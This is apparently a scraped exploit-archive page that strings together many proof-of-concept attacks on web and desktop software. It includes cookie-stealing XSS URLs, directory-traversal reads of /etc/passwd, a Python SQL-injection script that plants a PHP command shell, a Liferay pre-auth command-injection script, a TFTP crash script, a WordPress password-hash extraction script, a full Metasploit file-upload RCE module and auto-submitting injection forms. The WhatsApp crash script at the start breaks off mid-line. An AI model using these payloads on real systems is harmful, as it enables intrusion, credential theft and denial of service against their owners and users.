HireHackking

# Mirror: http://pastebin.com/raw.php?i=CZChGAnG # Video: https://www.youtube.com/watch?v=V7bnLOohqqI #!/usr/bin/python #-*- coding: utf-8 -* # Title: WhatsApp Remote Reboot/Crash App Android # Product: WhatsApp # Vendor Homepage: http://www.whatsapp.com # Vulnerable Version(s): 2.11.476 # Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4 # Date: 26/12/2014 # #RemoteExecution - www.remoteexecution.net # # Author Exploit: # Daniel Godoy @0xhielasangre <danielgodoy@gobiernofederal.com> # Credits: # Gonza Cabrera # # Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html # # Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android. # It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even # engaging in an interactive conversation over WhatsApp protocol # import argparse, sys, os, csv from Yowsup.Common.utilities import Utilities from Yowsup.Common.debugger import Debugger from Yowsup.Common.constants import Constants from Examples.CmdClient import WhatsappCmdClient from Examples.EchoClient import WhatsappEchoClient from Examples.ListenerClient import WhatsappListenerClient from Yowsup.Registration.v1.coderequest import WACodeRequest from Yowsup.Registration.v1.regrequest import WARegRequest from Yowsup.Registration.v1.existsrequest import WAExistsRequest from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2 from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2 from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2 from Yowsup.Contacts.contacts import WAContactsSyncRequest import threading,time, base64 DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth" COUNTRIES_CSV = "countries.csv" DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth" ######## Yowsup Configuration file ##################### # Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n # phone: Your full phone number including country code, without '+' or '00' # id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup # on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions # of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on # a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials # or want to register, you can leave this field blank or set it to some random text. # password: Password to use for login. You obtain this password when you register using Yowsup. ###################################################### MINE_CONFIG ="config" def getCredentials(config = DEFAULT_CONFIG): if os.path.isfile(config): f = open(config) phone = "" idx = "" pw = "" cc = "" try: for l in f: line = l.strip() if len(line) and line[0] not in ('#',';'): prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1) varname = prep[0].strip() val = prep[1].strip() if varname == "phone": phone = val elif varname == "id": idx = val elif varname =="password": pw =val elif varname == "cc": cc = val return (cc, phone, idx, pw); except: pass return 0 def main(phone): credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG ) if credentials: countryCode, login, identity, password = credentials identity = Utilities.processIdentity(identity) password = base64.b64decode(password) # Custom message that will crash WhatsApp message = message = "#RemoteExecution

source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. This vulnerability affects the following supported versions: 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 http://XXX.XXX.XXX.XXX/jde/E1Menu_Menu.mafService Parameter: e1.namespace * The POST request has been set to: %2Balert%2835890%29%2B /jde/E1Menu_Menu.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_Menu&e1.namespace=%2Balert%2835890%29%2B HTTP/1.0 Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000b7KChC3OjQct7TOz9U6NMhK:14p7umbnp; e1MenuState=100003759| Content-Length: 12 Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: XXX.XXX.XXX.XXX Content-Type: application/x-www-form-urlencoded Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED nodeId=&a=lc

source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. This vulnerability affects the following supported versions: 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 http://XXX.XXX.XXX.XXX/jde/E1Menu_OCL.mafService Parameter: e1.namespace * The GET request has been set to: %2Balert%2848981%29%2B /jde/E1Menu_OCL.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu&e1.service=E1Menu_OCL&e1.namespace=%2Balert%2848981%29%2B&timestamp=1290796450377 HTTP/1.0 Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000xXDQLJurffGMVi6Du_UnL0Z:14p7umbnp; e1MenuState=100003759| Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: XXX.XXX.XXX.XXX Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED

source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. This vulnerability affects the following supported versions: 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 http://XXX.XXX.XXX.XXX/jde/MafletClose.mafService Parameter: RENDER_MAFLET * The GET request has been set to: E1Menu"%2Balert%2844218%29%2B" /jde/MafletClose.mafService?e1.mode=view&e1.state=maximized&RENDER_MAFLET=E1Menu"%2Balert%2844218%29%2B"&e1.service=MafletClose&e1.namespace= HTTP/1.0 Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=0000FGUGWkc2Y9q-dO3GqshuPVQ:14p7umbnp; e1MenuState=100003759| Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: XXX.XXX.XXX.XXX Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED

source: https://www.securityfocus.com/bid/47500/info webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. webSPELL 4.2.2a is affected; other versions may also be vulnerable. http://www.example.com/index.php?site=newsletter&pass=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E http://www.example.com/index.php?site=messenger&action=touser&touser=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E http://www.example.com/admin/admincenter.php?site=users&action=addtoclan&id=1&page=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E http://www.example.com/admin/admincenter.php?site=squads&action=edit&squadID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E http://www.example.com/admin/admincenter.php?site=contact&action=edit&contactID=1%22%3E%3Cimg%20src=1.png%20onerror=alert%28document.cookie%29%3E

source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. This vulnerability affects the following supported versions: 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 * http://XXX.XXX.XXX.XXX/jde/JASMafletMafBrowserClose.mafService Parameter: jdemafjasLinkTarget * The GET request has been set to: E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B" /jde/JASMafletMafBrowserClose.mafService?jdemafjasFrom=BrowserClose&e1.mode=view&jdeLoginAction=LOGOUT&e1.state=maximized&jdemafjasLinkTarget=E1MENUMAIN_3860308878877903872"%2Balert%28222735%29%2B"&RENDER_MAFLET=E1Menu&jdemafjasLauncher=PSFT_TE_V3_SW&e1.service=JASMafletMafBrowserClose&e1.namespace= HTTP/1.0 Cookie: e1AppState=0:|; advancedState=none; JSESSIONID=00003wyVho0_-Ma0fQp67cuqdCs:14p7ulc8o; e1MenuState=100003759| Accept: */* Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: XXX.XXX.XXX.XXX Referer: http://XXX.XXX.XXX.XXX/jde/E1Menu.maf?selectJPD812=*ALL&envRadioGroup=&jdeowpBackButtonProtect=PROTECTED

source: https://www.securityfocus.com/bid/47509/info Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks. Viola DVR VIO-4/1000 is vulnerable; other products may also be affected. http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd

source: https://www.securityfocus.com/bid/47526/info SyCtel Design is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. http://www.example.com/index.php?menu=../../../proc/self/environ http://www.example.com/index1.php?menu=../../../etc/passwd

source: https://www.securityfocus.com/bid/47519/info Automagick Tube Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Automagick Tube Script 1.4.4 is vulnerable; other versions may also be affected. http://www.example.com/index.php?module=<script>alert(8888)</script>

source: https://www.securityfocus.com/bid/47528/info Zenphoto is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Zenphoto 1.4.0.3 is vulnerable; other versions may also be affected. http://www.example.com/themes/zenpage/slideshow.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E http://www.example.com/themes/stopdesign/comment_form.php?_zp_themeroot=%22%3E%3Cscript%3Ealert%28%22XSS%22%29;%3C/script%3E

source: https://www.securityfocus.com/bid/47540/info todoyu is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. todoyu 2.0.8 is vulnerable; other versions may also be affected. http://www.example.com/todoyu/lib/js/jscalendar/php/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E

source: https://www.securityfocus.com/bid/47541/info LightNEasy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. LightNEasy 3.2.3 is vulnerable; other versions may also be affected. # ------------------------------------------------------------------------ # Software................LightNEasy 3.2.3 # Vulnerability...........SQL Injection # Threat Level............Critical (4/5) # Download................http://www.lightneasy.org/ # Discovery Date..........4/21/2011 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................AutoSec Tools # Site....................http://www.autosectools.com/ # Email...................John Leitch <john@autosectools.com> # ------------------------------------------------------------------------ # # # --Description-- # # A SQL injection vulnerability in LightNEasy 3.2.3 can be exploited to # extract arbitrary data. In some environments it may be possible to # create a PHP shell. # # # --PoC-- import socket host = 'localhost' path = '/lne323' shell_path = '/shell.php' port = 80 def upload_shell(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(8) s.send('POST ' + path + '/index.php?do=&page= HTTP/1.1\r\n' 'Host: localhost\r\n' 'Proxy-Connection: keep-alive\r\n' 'User-Agent: x\r\n' 'Content-Length: 73\r\n' 'Cache-Control: max-age=0\r\n' 'Origin: null\r\n' 'Content-Type: multipart/form-data; boundary=----x\r\n' 'Cookie: userhandle=%22UNION/**/SELECT/**/CONCAT(char(60),char(63),char(112),char(104),char(112),char(32),char(115),char(121),char(115),char(116),char(101),char(109),char(40),char(36),char(95),char(71),char(69),char(84),char(91),char(39),char(67),char(77),char(68),char(39),char(93),char(41),char(59),char(32),char(63),char(62)),%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22,%22%22/**/FROM/**/dual/**/INTO/**/OUTFILE%22../../htdocs/shell.php%22%23\r\n' 'Accept: text/html\r\n' 'Accept-Language: en-US,en;q=0.8\r\n' 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' '\r\n' '------x\r\n' 'Content-Disposition: form-data; name="submit"\r\n' '\r\n' '\r\n' '------x--\r\n' '\r\n') resp = s.recv(8192) http_ok = 'HTTP/1.1 200 OK' if http_ok not in resp[:len(http_ok)]: print 'error uploading shell' return else: print 'shell uploaded' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.settimeout(8) s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\ 'Host: ' + host + '\r\n\r\n') if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found' else: print 'shell located at http://' + host + shell_path upload_shell()

#!/bin/sh # Exploit title: Liferay Portal 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 RCE # Date: 11/16/2014 # Exploit author: drone (@dronesec) # Vendor homepage: http://www.liferay.com/ # Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip # Version: 7.0.0 M1, 7.0.0 M2, 7.0.0 M3 # Fixed in: 7.0.3 # Tested on: Windows 7 # Pre-auth command injection using an exposed Apache Felix, # exposed by default on all Liferay Portal 7.0 installs. # # ./liferay_portal7.sh 192.168.1.1 "cmd.exe /C calc.exe" # (echo open $1 11311 sleep 1 echo system:getproperties sleep 1 echo exec \"$2\" sleep 1 ) | telnet

source: https://www.securityfocus.com/bid/47542/info Dolibarr is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the affected application. Information harvested may aid in further attacks. The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Dolibarr 3.0.0 is vulnerable; other versions may also be affected. http://www.example.com/dolibarr-3.0.0/htdocs/document.php?lang=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E http://www.example.com/dolibarr-3.0.0/htdocs/user/passwordforgotten.php?theme=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

source: https://www.securityfocus.com/bid/47552/info Nuke Evolution Xtreme is prone to a local file-include vulnerability and an SQL-injection vulnerability. An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute arbitrary local files within the context of the webserver process. The attacker can exploit the SQL-injection vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Nuke Evolution Xtreme 2.0 is vulnerable; other versions may also be affected. http://www.example.com/[path]/modules.php?name=Surveys&op=results&pollID=3+and+1=2+union+select+1,version(),3,4,5-- http://www.example.com/[path]/modules.php?name=News&file=../../../../../../../../../../etc/passwd%00 http://www.example.com/[path]/modules.php?name=Private_Messages&file=../../../../../../../../../../etc/passwd%00

source: https://www.securityfocus.com/bid/47561/info AT-TFTP is prone to a remote denial-of-service vulnerability. Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. AT-TFTP 1.8 is affected; other versions may also be vulnerable. #!/usr/bin/python ############################################################################## # Exploit : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX # http://secpod.org/wintftp_dos_poc.py # Reference : # Author : Antu Sanadi from SecPod Technologies (www.secpod.com) # # Exploit will crash AT-TFTP Server v1.8 Service # Tested against AT-TFTP Server v1.8 server ############################################################################## import socket import sys host = '127.0.0.1' port = 69 try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) except: print "socket() failed" sys.exit(1) addr = (host,port)1 data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\ '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00' s.sendto(data, (host, port))

source: https://www.securityfocus.com/bid/47569/info TemaTres is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. TemaTres 1.3 is vulnerable; prior versions may also be affected. http://www.example.com/tematres1.3/vocab/index.php?_search_expresions=[xss]

source: https://www.securityfocus.com/bid/47574/info The Sermon Browser plugin for WordPress is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Sermon Browser 0.43 is vulnerable; other versions may also be affected. <?php if(!$argv[1]) die(" Usage : php exploit.php [site] Example : php exploit.php http://site.com/wp/ "); print_r(" # Tilte......: [ WordPress SermonBrowser Plugin 0.43 SQL Injection ] # Author.....: [ Ma3sTr0-Dz ] # Date.......: [ 25-o4-2o11 ] # Location ..: [ ALGERIA ] # HoMe ......: [ wWw.sEc4EvEr.CoM ] # Download ..: [ http://www.4-14.org.uk/wordpress-plugins/sermon-browser ] # Gr33tz ....: [ All Sec4ever Member'z ] # Real Bug Founder : Lagripe-Dz -==[ ExPloiT ]==- # SQL Inj : http://site/wp/?sermon_id=-1+union+select+version(),2-- # XSS : http://site/wp/?download&file_name=<script>alert(0)</script> # FPD : http://site/wp/wp-content/plugins/sermon-browser/sermon.php -==[ Start ]==- "); $t=array("db_usr"=>"user()","db_ver"=>"version()","db_nam"=>"database()","usr_nm"=>"user_login","passwd"=>"user_pass"); function text2hex($string) { $hex = ''; $len = strlen($string) ; for ($i = 0; $i < $len; $i++) { $hex .= str_pad(dechex(ord($string[$i])), 2, 0, STR_PAD_LEFT); } return $hex; } foreach($t as $r=>$y){ $x=@file_get_contents($argv[1]."?sermon_id=-1/**/UnIoN/**/SeLeCt/**/group_concat(0x".text2hex("<$r>").",$y,0x".text2hex("<$r>")."),2+from+wp_users+where+ID=1--"); preg_match_all("{<$r>(.*?)<$r>}i",$x, $dz); echo $u = ($dz[1][0]) ? "[-] $r : ".$dz[1][0]."\n" : "[-] $r : Failed !\n"; } print_r(" -==[ Finished ]==- "); # By Lagripe-Dz .. ! # END .. ! ?>

source: https://www.securityfocus.com/bid/47571/info eXPert PDF is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds check user-supplied data before copying it into an insufficiently sized buffer. An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. #!/usr/bin/perl sub logo { print STDERR << "EOF"; 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 EOF } # --------- # eXPert PDF Editor 7 Professional Heap Proof Of Concept Exploit # Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com> # special thanks to : Inj3ct0r Team + exploit-id Team # --------- # Target : eXPert PDF Editor v7.0.880.0 # Tested in Windows XP sp3 France # Creating The Bad File .PJ And => Bo0M ! # Heap 0x0174EC24 in 'vspdfeditor140.bpl' . addres 00000008 my $PoC = "\x4b\x45\x44\x41\x4e\x53"; # NULL Heap PoC open (FILE,">> KedAns.pj"); # Bad File Here print FILE $PoC; close (FILE); # KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans

source: https://www.securityfocus.com/bid/47576/info html-edit CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. html-edit CMS 3.1.9 is vulnerable; other versions may also be affected. http://www.example.com/[Path]/addons/image_slider/index.php?html_output=[XSS]

# Exploit Title: Social Microblogging PRO 1.5 Stored XSS Vulnerability # Date: 29-12-2014 # Exploit Author: Halil Dalabasmaz # Version: v1.5 # Vendor Homepage: http://codecanyon.net/item/social-microblogging-pro/9217005 # Tested on: Chrome & Iceweasel # Vulnerability Description: ===Stored XSS=== "Web Site" input is not secure at Profile section. You can run XSS payloads on "Web Site" input. Sample Payload for Stored XSS: http://example.com/">[xssPayload] =Solution= Filter the input field against to XSS attacks. ================

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'ProjectSend Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Fady Mohammed Osman', # Discovery and Exploit 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit ], 'References' => [ ['EDB', '35424'] ], 'Payload' => { 'BadChars' => "\x00" }, 'Arch' => ARCH_PHP, 'Platform' => 'php', 'Targets' => [ # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu) ['ProjectSend (PHP Payload)', {}] ], 'Privileged' => false, 'DisclosureDate' => 'Dec 02 2014', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/']) ], self.class) end # # Checks if target upload functionality is working # def check res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'process-upload.php') ) if !res vprint_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown elsif res.code.to_i == 404 vprint_error("#{peer} - No process-upload.php found") return Exploit::CheckCode::Safe elsif res.code.to_i == 500 vprint_error("#{peer} - Unable to write file") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/ vprint_error("#{peer} - File process-upload.php is not executable") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/ vprint_error("#{peer} - Software is misconfigured") return Exploit::CheckCode::Safe elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/ # response on revision 118 onwards includes the file name if res.body && res.body =~ /NewFileName/ return Exploit::CheckCode::Vulnerable # response on revisions 100 to 117 does not include the file name elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ return Exploit::CheckCode::Appears elsif res.body && res.body =~ /Failed to open output stream/ vprint_error("#{peer} - Upload folder is not writable") return Exploit::CheckCode::Safe else return Exploit::CheckCode::Detected end else return Exploit::CheckCode::Safe end end # # Upload PHP payload # def upload fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php" php = "<?php #{payload.encoded} ?>" data = Rex::MIME::Message.new data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}")) post_data = data.to_s print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if !res fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading") elsif res.code.to_i == 404 fail_with(Failure::NotFound, "#{peer} - No process-upload.php found") elsif res.code.to_i == 500 fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}") elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/ fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable") elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/ fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable") elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/ fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured") # response on revision 118 onwards includes the file name elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/ print_good("#{peer} - Payload uploaded successfully (#{fname})") return fname # response on revisions 100 to 117 does not include the file name elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/ print_warning("#{peer} - File upload may have failed") return fname else vprint_debug("#{peer} - Received response: #{res.code} - #{res.body}") fail_with(Failure::Unknown, "#{peer} - Something went wrong") end end # # Execute uploaded file # def exec(upload_path) print_status("#{peer} - Executing #{upload_path}...") res = send_request_raw( { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5 ) if !res print_status("#{peer} - Request timed out while executing") elsif res.code.to_i == 404 vprint_error("#{peer} - Not found: #{upload_path}") elsif res.code.to_i == 200 vprint_good("#{peer} - Executed #{upload_path}") else print_error("#{peer} - Unexpected reply") end end # # upload && execute # def exploit fname = upload register_files_for_cleanup(fname) exec("upload/files/#{fname}") # default for r-221 onwards unless session_created? exec("upload/temp/#{fname}") # default for r-100 to r-219 end end end

source: https://www.securityfocus.com/bid/47578/info Noah's Classifieds is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. <form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data"> <input type="hidden" name="list" value="item"> <input type="hidden" name="method" value="create"> <input type="hidden" name="rollid" value="2"> <input type="hidden" name="id" value="0"> <input type="hidden" name="cid" value="2"> <input type="hidden" name="col_16" value=""> <input type="hidden" name="col_17" value=&#039;title"><script>alert(document.cookie)</script>&#039;> <input type="hidden" name="col_18" value=&#039;<p>description of my"&gt;</p> <script type="text/javascript">// <![CDATA[ alert(document.cookie) // ]]></script>&#039;> <input type="hidden" name="col_19" value="Pc"> <input type="hidden" name="col_20" value=""> <input type="hidden" name="gsubmit" value="Ok"> </form> <script> document.main.submit(); </script> <form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data"> <input type="hidden" name="list" value="appcategory"> <input type="hidden" name="method" value="modify"> <input type="hidden" name="rollid" value="5"> <input type="hidden" name="id" value="5"> <input type="hidden" name="up" value="1"> <input type="hidden" name="wholeName" value="catitem"> <input type="hidden" name="name" value="catitem"> <input type="hidden" name="description" value=&#039;cat2"><script>alert(document.cookie)</script>&#039;> <input type="hidden" name="picture" value=""> <input type="hidden" name="descriptionMeta" value=""> <input type="hidden" name="keywords" value=""> <input type="hidden" name="customAdMeta" value=""> <input type="hidden" name="allowAd" value="1"> <input type="hidden" name="immediateAppear" value="1"> <input type="hidden" name="inactivateOnModify" value="1"> <input type="hidden" name="displayResponseLink" value="1"> <input type="hidden" name="displayFriendmailLink" value="1"> <input type="hidden" name="displayFlaggedLink" value="1"> <input type="hidden" name="customAdListTitle" value=""> <input type="hidden" name="customAdListTemplate" value=""> <input type="hidden" name="customAdDetailsTemplate" value=""> <input type="hidden" name="gsubmit" value="Ok"> </form> <script> document.main.submit(); </script> <form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data"> <input type="hidden" name="list" value="appsettings"> <input type="hidden" name="method" value="modify"> <input type="hidden" name="rollid" value="1"> <input type="hidden" name="id" value="1"> <input type="hidden" name="defaultTheme" value="modern"> <input type="hidden" name="defaultLanguage" value="en"> <input type="hidden" name="langDir" value="ltr"> <input type="hidden" name="adminEmail" value=""> <input type="hidden" name="titlePrefix" value=&#039;[Noahs Classifieds]</title><script>alert(document.cookie)</script>&#039;> <input type="hidden" name="mainTitle" value=""> <input type="hidden" name="charLimit" value="0"> <input type="hidden" name="blockSize" value="20"> <input type="hidden" name="dateFormat" value="Y-m-d"> <input type="hidden" name="timeFormat" value="Y-m-d H:i"> <input type="hidden" name="gsubmit" value="Ok"> </form> <script> document.main.submit(); </script>

